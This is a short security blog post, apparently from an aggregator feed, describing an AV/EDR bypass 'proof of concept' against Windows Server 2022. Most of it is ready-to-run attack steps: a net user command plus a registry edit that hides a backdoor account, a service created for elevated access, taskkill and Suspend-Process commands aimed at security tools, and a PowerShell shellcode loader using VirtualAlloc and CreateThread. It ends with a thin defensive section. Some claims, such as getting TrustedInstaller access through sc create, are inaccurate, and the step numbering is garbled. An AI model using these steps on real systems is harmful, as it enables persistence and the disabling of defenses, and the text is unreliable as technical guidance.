Listen to this Post
In this article, we explore a Proof of Concept (POC) for bypassing AV/EDR on a critical server, specifically targeting Windows Server 2022. The technique involves anti-forensic measures, persistence mechanisms, and adding a hidden user to gain TrustedInstaller access for loading malicious drivers and disabling EDR/AV. This can be integrated with PE-Loader and in-memory injection for advanced exploitation.
You Should Know:
1. Adding a Hidden User
To create a hidden user on a Windows system, use the following command:
[cmd]
net user hiddenuser Password123 /add /active:yes
[/cmd]
To hide the user from the login screen, modify the registry:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hiddenuser /t REG_DWORD /d 0 /f
#### **2. Gaining TrustedInstaller Access**
TrustedInstaller is a system account with high privileges. To impersonate it, use the following steps:
1. Open Command Prompt as Administrator.
- Use the `sc` command to create a service:
sc create TrustedInstallerSvc binPath= "C:\Windows\System32\cmd.exe" start= auto
3. Start the service:
sc start TrustedInstallerSvc
#### **3. Disabling EDR/AV**
To kill EDR/AV processes, identify the process name and terminate it:
taskkill /f /im edr_process.exe
For a more stealthy approach, use PowerShell to suspend the process:
Suspend-Process -Name edr_process
#### **4. PE-Loader and In-Memory Injection**
For in-memory injection, use tools like PowerShell Empire or Cobalt Strike. Here’s a basic example using PowerShell:
$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);'
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $shellcode = 0x90,0x90,0x90...
$size = $shellcode.Length
[IntPtr]$addr = $winFunc::VirtualAlloc(0,$size,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $size)
$winFunc::CreateThread(0,0,$addr,0,0,0)
### **What Undercode Say:**
This POC demonstrates the potential risks of AV/EDR bypass techniques on critical servers. System administrators must ensure proper hardening of servers, including regular patching, monitoring for hidden users, and restricting high-privilege access. For defenders, understanding these techniques is crucial for developing robust detection and response mechanisms.
**Relevant Commands for Defense:**
- Monitor hidden users:
net user
- Check for suspicious services:
sc query
- Audit process activity:
Get-Process | Where-Object { $_.ProcessName -eq "edr_process" }
For further reading, refer to:
Stay vigilant and keep your systems secure!
References:
Reported By: Hassan Sohrabian – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅



